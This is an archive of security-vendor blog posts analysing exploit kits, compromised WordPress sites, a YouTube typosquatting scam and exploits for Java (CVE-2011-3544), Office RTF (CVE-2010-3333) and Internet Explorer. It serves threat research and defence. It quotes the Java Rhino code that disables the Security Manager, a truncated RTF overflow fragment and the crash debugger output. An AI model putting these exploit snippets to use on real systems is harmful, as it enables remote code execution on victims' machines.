Cybercrime « M86 Security Labs Blog

Archive for the ‘Cybercrime’ Category

Massive Compromise of WordPress-based Sites but ‘Everything will be Fine’

By Daniel Chechik • January 30th, 2012 • Cybercrime Malware

A few days ago, hundreds of websites, based on WordPress 3.2.1, were compromised. The attacker uploaded an HTML page to the standard Uploads folder and that page redirects the user to the Phoenix Exploit Kit. Its logs show that users from at least four hundred compromised sites were redirected to Phoenix exploit pages. Here is a partial list of those websites:

: Partial list of compromised WordPress websites

The content uploaded by the attacker is not part of the home page and will not show when users browse these websites. In fact, accessing any page on these compromised WordPress sites, other than the uploaded page, will not infect the user’s machine. The general motivation of attackers to compromise websites is mainly to bypass URL reputation mechanisms, spam filters and certain security policies.
In order to lure users to these pages, the attacker sent thousands of malicious emails querying an unfamiliar bill and asking recipients to click on a link as described by Websense blog. The link points to the aforementioned uploaded page.

The malicious uploaded page

The page is obfuscated and adds a hidden IFRAME that leads to the Phoenix Exploit Kit:

The exploit page is hosted in a Russian domain called horoshovsebudet which roughly translates as “Everything will be fine”, showing a certain sense of humor by these attackers.
The Phoenix Exploit Kit identifies the User Agent of the client machine and delivers a customized exploit Web page. The following obfuscated page was served when accessing with Internet Explorer 6:

The obfuscated Phoenix exploit page

The obfuscated page above generates code which attempts exploiting multiple vulnerabilities in Microsoft Internet Explorer, Adobe PDF, Flash and Oracle Java as described in the Phoenix Exploit Kit blog. Among those exploits is the latest Java Rhino vulnerability as shown in the following screenshot and taken from the original malicious server.

Statistics on Phoenix Exploit Kit control panel

Note the successful exploitation rate of the Java Rhino vulnerability and of the PDF Libtiff vulnerability. Even the MDAC vulnerability is successfully exploited which is surprising given that it only exists in the old version 6 of Internet Explorer.

Interestingly enough, the “Browser statistics” chart in the screen shot above shows that none of the victims used Google Chrome. Taking a closer look at the source code of the Phoenix Exploit Kit reveals that Chrome browser is explicitly excluded, for no obvious reason:

: Phoenix Exploit Kit source code

All M86 Secure Web Gateway customers are protected against this attack by default. The access to the exploit page is blocked.

As usual, stay safe and be careful not to click links in suspicious emails.

Tags: compromised websites | Java Rhino | Phoenix exploit kit 3.0 | Phoenix Exploit Kit source code | Wordpress

Prevalent Exploit Kits Updated with a New Java Exploit

By Daniel Chechik • December 16th, 2011 • Cybercrime Malware Vulnerabilities

Until recently, most of the vulnerabilities exploited by popular exploit kits were found last year or even earlier. Moreover, it would take authors at least a month to update their kits with the new exploits that had been discovered in the wild. However, in the past few weeks, authors released an updated version of their kits with a new recent exploit before a patch had been released.

First, a new version of the Blackhole exploit kit was released, version 1.2.1:

: Live Blackhole Exploit Kit control panel

The Blackhole exploit kit presented above was modified to exploit clients that have Java installed, using the recently discovered CVE-2011-3544 vulnerability. This is the only vulnerability that is actually being exploited.
A few days later, a new version of Phoenix exploit kit 3.0 was released, just a few weeks after the release of its predecessor, Phoenix 2.9.

Live Phoenix Exploit Kit 3.0 control panel

Notice the red boxes in the screen shots above: A new exploit was added to those exploit kits, which is the reason for the upgrade.

A few weeks ago Michael ‘mihi’ Schierl described a design error in Java. Basically this vulnerability is similar to other Java vulnerabilities where an untrusted code is executed in elevated privileges. Rhino is a Javascript engine that runs under the JVM and can interact with Java applets. An attacker can bypass the scripting engine protection by generating an error object, using Rhino script, which runs in elevated privileges and executing code that disables the Security Manager. Once the Security Manager is disabled, the attacker can execute code with full permissions.

Not long after the discovery, an exploit module was published in Metasploit. First, the code binds a Rhino object with the applet:

import javax.script.*;
…
ScriptEngine engine = new ScriptEngineManager().getEngineByName(“js”);
Bindings b = engine.createBindings();
b.put(“applet”, this);

The Java code executes a script that bypasses the Security Manager protection by using the “toString” method inside a script context:

Object proxy = (Object) engine.eval(
“this.toString = function() {” +
“                      java.lang.System.setSecurityManager(null);” +
“                      applet.callBack();” +
“                      return String.fromCharCode(97 + Math.round(Math.random() * 25));”+
“};” +
“e = new Error();” +
“e.message = this;” +
“e”, b);

The script throws an exception, and the rest of the code would be executed.

catch (ScriptException e) {
e.printStackTrace();
}

The vulnerability is cross-platform and doesn’t require heap spray or buffer overflow techniques. That makes it very effective and therefore authors of exploit kits rushed to add it to their kits. The concerning aspect is that the Blackhole exploit kit was updated even before a patch was released by the vendor.

Customers of all versions of M86 Secure Web Gateway are safe, as it provides zero-day protection against this vulnerability by default.

We highly encourage users to keep their Java updated, or remove it if it is not needed. A patch for this Java vulnerability is available by now: Look for Java 6 Update 29, or Java 7 Update 1.

Typosquatters exploit misspelled variations of YouTube.com domain name

By Rodel Mendrez • September 8th, 2011 • Cybercrime

Here is a scenario that may sound familiar to you. You were in front of your computer one night and decided to watch some YouTube clips. So you opened your favourite browser and because you have clumsy fingers, instead of typing “YouTube.com” in the address bar you entered “YoutTube.com”. A second later, a Web page loads up, but instead of YouTube’s homepage, the page redirects you to an online survey. You got confused and didn’t expect this webpage, but since the website looks like the real YouTube site, and you get a chance to win an awesome Macbook Air, iPhone 4 or an iPad 2, you decided to take the plunge anyway.

Welcome to typosquatting. Typosquatting is a form of cybersquatting where someone registers an intentionally misspelled domain name which is nearly identical to the target’s brand name and takes advantage of users who mistakenly enter misspelled domain names. Typosquatting is not a new phenomenon but it is widespread. Only last week the folks at OpenDNS observed a typosquatting scam driven off Twitter’s domain.

In our YouTube example, traffic is redirected to the “online survey” website videorewardsonline.com when the user enters YoutTube.com. According to Alexa.com, the domain videorewardsonline.com was only created on August 24 and has had a rapid spike in traffic with a 29% increase in the percentage of global page views. We believe this spike was due to users being redirected by typosquatted domain names.

We have found the following misspelled variations of “YouTube” domains redirecting to either, a “survey” website, or to an online dating website.

Yotube.com

Yutube.com

Yuube.com

Youtbe.com

Youtue.com

Youtub.com

Youube.com

Tubeyou.com

Yutbe.com

Outube.com

Yotub.com

Yutub.com

Youtbue.com

Youttube.com

Yyoutube.com

The survey website also caters for localized versions of itself. It utilizes the IP address geolocation to make it appear more convincing. In the screenshot below, a German webpage is shown if you are located in Germany.

At first glance, the survey website looks rather harmless. However, in order to participate and “win” prizes it requires entering your email and mobile number. At this point you may feel that this is starting to look somewhat dodgy.

However, the worst part comes after you enter your mobile number. The screenshot below shows that main purpose of the “survey” is to convince people to subscribe to an auto-renewing SMS subscription service which will be charged to the user’s phone bill.

You can clearly see how the people behind this typosquatting scam take advantage of an organization’s strong visual brand to trick unsuspecting users in parting with their personal information. In this case, by imitating YouTube’s look and feel, the scamsters piggyback on that brand’s trust to make the “rewards” seem genuine.

Be careful what you type in your browser’s address bar, and always read the fine print to avoid being scammed.

Tags: Legitimate Sites | Online Survey | Social Engineering | Typosquatting | YouTube

Resurrection of CVE-2010-3333 In-The-Wild

By Yaniv Miron • July 5th, 2011 • Cybercrime

During the last few weeks we’ve seen massive use of the CVE-2010-3333 vulnerability for Microsoft Office. This eight months old vulnerability is used in popular documents such as a document that pretends to be “President Obama’s Speech”.

Microsoft Office vulnerabilities have become very popular over the last few years and here are several samples that can be found In-The-Wild that use MS10-087 / CVE-2010-3333.

A brief overview of the vulnerability can be found at mitre CVE-2010-3333

“Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka “RTF Stack Buffer Overflow Vulnerability.”

As we can see there is an exploit that is a part of the Metasploit exploit framework:

Figure 1 – Metasploit main page

The vulnerability is actually an .RTF file type vulnerability but can be launched by using a .DOC file (not an actual .DOC file but a .DOC extension).

Figure 2 – Part of the exploit from Metasploit

CVE-2010-3333 Sample Analysis

File Name: President Obama’s Speech.doc

MD5: 35c33bbd97d7f5629d64153a1b3e71f1

The following analysis was performed via Word 2003.

Here we can see the text view of the file and we can clearly see that they are using CVE-2010-3333:

Figure 3 – Text view of CVE-2010-3333 sample

Lets examine the hex view of the file:

Figure 4 – Hex view of CVE-2010-3333 sample

Now, let’s examine the beginning of the file:

{\rtf1{\shp{\*\shpinst{\sp{\sn pFragments}{\sv 1;1000000…[SNIP]…0;01234567ff000…[SNIP]…

From Microsoft Office Word 2003 Rich Text Format (RTF) Specification:

“Drawing Object Properties

The bulk of a drawing object is defined as a series of properties. The { \shp ………… control word is followed by { \*\shpinst Following the { \*\shpinst is a list of all the properties of a shape. Each of the properties is in the following format:

{ \sp { \sn PropertyName } { \sv PropertyValueInformation } }

The control word for the drawing object property is \sp. Each property has a pairing of the name (\sn) and value (\sv) control words placed in the shape property group.”

We see that it’s an .RTF file type, that contains a “sn” (Designates paragraph style.) with a PropertyName “pFragments” (Fragments are optional, additional parts to the shape. They allow the shape to contain multiple paths and parts. This property lists the fragments of the shape.). After that, we see a “sv” that contains a value, a semicolon and a second value followed by a second semicolon and a third value. The third value is the cause of the buffer overflow.

Now that we’ve seen that hackers use the vulnerability In-The-Wild, let’s try and get a better understanding of the vulnerability by using the Metasploit sample:

{\rtf1{\shp{\sp{\sn pFragments}{\sv 5;6;11111111acc8111…[SNIP]…

ASM Info:

30e9eb72 81e1ffff0000 and ecx,0FFFFh

30e9eb78 56 push esi

30e9eb79 8bf1 mov esi,ecx

30e9eb7b 0faf742414 imul esi,dword ptr [esp+14h]

30e9eb80 037010 add esi,dword ptr [eax+10h]

30e9eb83 8bc1 mov eax,ecx

30e9eb85 c1e902 shr ecx,2

30e9eb88 f3a5 rep movs dword ptr es:[edi],dword ptr [esi] ; Overflow!

30e9eb8a 8bc8 mov ecx,eax

30e9eb8c 83e103 and ecx,3

30e9eb8f f3a4 rep movs byte ptr es:[edi],byte ptr [esi]

30e9eb91 5e pop esi

30e9eb92 5f pop edi

30e9eb93 c20c00 ret 0Ch

Debugger info:

(100.3f8): Access violation – code c0000005 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

eax=0000c8ac ebx=05000000 ecx=00000023 edx=00000000 esi=025dc82c edi=00130000

eip=30e9eb88 esp=001237b8 ebp=001237f0 iopl=0 nv up ei pl nz na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206

…[SNIP]…

mso!Ordinal6426+0x64d:

30e9eb88 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]

In-The-Wild Samples

Here are few of the samples that we’ve found:

File Name: 2011 Insider’s Guide to Military Benefits .doc

MD5: f520c8671ddb9965bbf541f20635ef30

File Name: President Obama’s Speech.doc

MD5: 35c33bbd97d7f5629d64153a1b3e71f1

File Name: Q and A.doc

MD5: 46863c6078905dab6fd9c2a480e30ad0

The samples use different shellcodes, but as we can see, the exploit is In-The-Wild and is being used by malicious hackers.

These types of attacks are blocked by M86 Security’s Secure Web Gateway solution.

0-day exploit used in a targeted attack – CVE-2011-1255

By Avri Schneider • June 26th, 2011 • Cybercrime Malware Vulnerabilities

Time Element Memory Corruption – a remote code execution vulnerability, recently patched by Microsoft as part of MS11-050, bearing the Common Vulnerabilities and Exposures (CVE) number CVE-2011-1255 is being actively exploited in the wild.

M86 Security Labs team was contacted and asked to inspect the URL of a legitimate website of a large private company that was blocked by one of the proactive detection rules implemented in our Secure Web Gateway product.

We were asked to investigate if it was indeed a malicious page or a case of Over-Blocking.

The page looked benign, but inspecting each included JavaScript code, we saw that one of them:

Was injecting an iframe:

pointing to a malicious page that was very easilty classified as malicious due to shellcode patterns being part of the page’s DOM:

So, just another infected site – big deal right? But, after further inspection, we saw that it exploited an un-published security vulnerability in Internet Explorer. To verify this, we viewed the malicious page on the latest fully patched version of IE and saw a crash followed by execution of malicious code.

You can imagine the excitement on the team – finding a 0-day in the wild!

The excitement of finding a 0-day in the wild didn’t last that long, since soon after, Microsoft released details about this particular vulnerability.

Based on data we have reviewed from various sources, we can say with a high level of certainty, that the anonymous researcher who according to Microsoft’s security advisory, reported the vulnerability details to VeriSign iDefense, or at least one of his acquaintances, had used the vulnerability details for malicious purposes, as part of targeted attacks.

We decided that we should inspect the shellcode to see what the attacker was after. It used various anti-debugging tricks, but after decoding, it revealed a clear-text URL pointing to a malicious server already listed in our repository.

The attack sample stored in our repository was an attack for the well-known iepeers.dll vulnerability exploiting CVE-2010-0806.

It is interesting to note that the first saved sample of the attack was dated 21.3.10, while details of the vulnerability were reported and patched by Microsoft’s MS10-018 security patch for Internet Explorer on 30.3.10.

Two 0-day exploits served from the same server – impressive!

We wanted to find out where else he is serving his malicious code.

Remember the code snippet shown above, showing how the attacker hid the shellcode as part of the DOM?

Hiding data in the DOM of the page is a good obfuscation technique that bypasses security software that doesn’t act as an actual browser, and where their script engine does not have access to the actual DOM.

It turns out that one of the side-effects of hiding data inside DIV elements is that it makes the data indexable by search engines.

Google searching the pattern “TTu0d0f[...snip...]d0dLL1043416UU” revealed about 16 results and as of this writing, only a few were still alive.

Here is the list of the infected sites according to Google’s search result:

Not to mention the service of caching samples for us, it’s ironic that an attacker’s obfuscation technique can be used against him to find his infection servers using a simple Google search.

Tags: 0day | CVE-2011-1255 | exploit | Internet Explorer

Phoenix Exploit Kit (2.7) continues to be updated

By Daniel Chechik • June 4th, 2011 • Cybercrime

A few weeks ago, the Phoenix Exploit Kit 2.5 source code was leaked. At the time, it was not really useable, as it required activating by the author of the exploit kit. It contains an activation page that is being used to load all the exploits to the server for every specific customer. As expected, the author of the exploit kit released a new version of the tool, version 2.7.

Phoenix Exploit’s Kit 2.7 logo

The changes between the two versions are minor, but still very important as most exploits become inefficient in the very short term, especially with the latest IE vulnerabilities.

Tags: Exploit Kits | Java | PDF | Phoenix

k0desploit Exploit Kit and Stolen Credit Cards Discovered

By Avri Schneider • March 9th, 2011 • Cybercrime

During our investigative research into existing and emerging threats, we tend to make new discoveries. One of the most recent cases involved the discovery of a new toolkit:

k0de Sploit Pack

The phrase at the bottom of the page (“K0de.org Open Source Exploits”) caught our attention, as we wondered how ‘open-source’ this toolkit really was. A quick Google search lead us to the third result:

Leaked Message from Exploit Kit Author

The post (or ‘paste’ if we go by Pastie.org‘s terminology) contained a leaked message written by the toolkit author in a private hacker-forum. It reveals that this new toolkit is just a clone of the popular Eleonore with various improvements:

“As you can see it’s pretty much elenores lay out with a few touch ups & very badly made paint buttons. I’ve only been working on this for 2 hours or so, so please keep that in mind and I plan to add a lot more onto it in the coming days, so keep an eye out for news.”

The author was nice enough to provide us with interesting statistics from his own research:

“Now then, I’ve tested this on 1,000 unique hits from windows PC’s only (Xp, Vista & Win7 only) and I achieved 96 infections from it, that means the rough infection rate is at 9.6%, that is a 3.5% rise from the great Elenore mod posted by Blackdevil. Most of the infections was from MDAC & the IE kit.”

The author then calls upon fellow malware authors for their help with updating the exploits to ‘fix’ the rise in detection rate of the malicious iframe. Also, the author lists some of the modifications he has made in this toolkit:

“Since I have tested it, the detection of the iframe has risen a lot, so in order to conduct a good test, someone will have to UD the exploits again.

I have also slightly fixed up the chrome & firefox exploits, I’m not 100% sure but they seem to be hitting at least, whereas they used to do nothing.”

In addition to the “open-source” exploit kit, the page contains a long list of anonymous proxy servers near the bottom as well as stolen credit card numbers along with the login credentials of dozens of individuals.

Here’s a screen-shot of what it looked like:

Screenshot of Stolen Credentials including CC#'s

We have confirmed that upon our notice, both Google and pastie.org have removed the illegal content, prior to publishing this blog post.